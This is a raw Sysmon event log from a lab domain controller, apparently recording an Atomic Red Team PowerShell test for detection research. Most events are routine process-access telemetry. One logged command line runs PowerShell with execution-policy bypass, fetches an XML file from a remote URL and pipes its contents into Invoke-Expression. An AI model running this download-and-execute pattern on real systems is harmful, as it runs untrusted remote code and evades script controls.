14:08:03.409{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203587Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203586Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203585Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203584Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E9C3-6040-524E-00000000AD01}4416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203583Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9C3-6040-524E-00000000AD01}4416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203582Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.415{5ABCFE62-E9C3-6040-524E-00000000AD01}4416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203581Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4FE2C9AD5D07BC04D9D3A38ACA9C391,SHA256=39C700936BD107310600B405FA6DF86FACE6737158670D0E45333809B7DA1F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203580Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=691613CA3B19D1161598840AC696D65D,SHA256=5A1B1F4452B7F31FAB189EDABBF53AB31CE01071F8BF0413DE21FE4EEFAADF26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203579Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8034BB0F81FF8DD75FED3C9117FF29F2,SHA256=06CB9D9BABBD26227E06ADD2F8F3A5E47664F286B1C3BE57A2C67870B65F8A4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203578Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.330{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203577Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.330{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203576Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.284{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203575Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.284{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203574Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:08:03.284{5ABCFE62-E9C3-6040-514E-00000000AD01}3816\PSHost.132593404832233030.3816.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203573Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.268{5ABCFE62-E9C3-6040-514E-00000000AD01}3816ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_tzdehlaz.tui.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203572Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.268{5ABCFE62-E9C3-6040-514E-00000000AD01}3816ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_kej01oye.zxl.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203571Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.252{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_kej01oye.zxl.ps12021-03-04 14:08:03.252 10341000x80000000000000002203570Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203569Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203568Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203567Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203566Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203565Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203564Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-99F1-603E-7907-00000000AD01}30802060C:\Windows\system32\csrss.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203563Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.221{5ABCFE62-E9C3-6040-504E-00000000AD01}33966112C:\Windows\system32\cmd.exe{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203562Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.223{5ABCFE62-E9C3-6040-514E-00000000AD01}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-E9C3-6040-504E-00000000AD01}3396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml');$Xml.command.a.execute | IEX"" 10341000x80000000000000002203561Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C3-6040-504E-00000000AD01}3396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203560Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C3-6040-504E-00000000AD01}3396C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203559Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203558Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.205{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203557Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 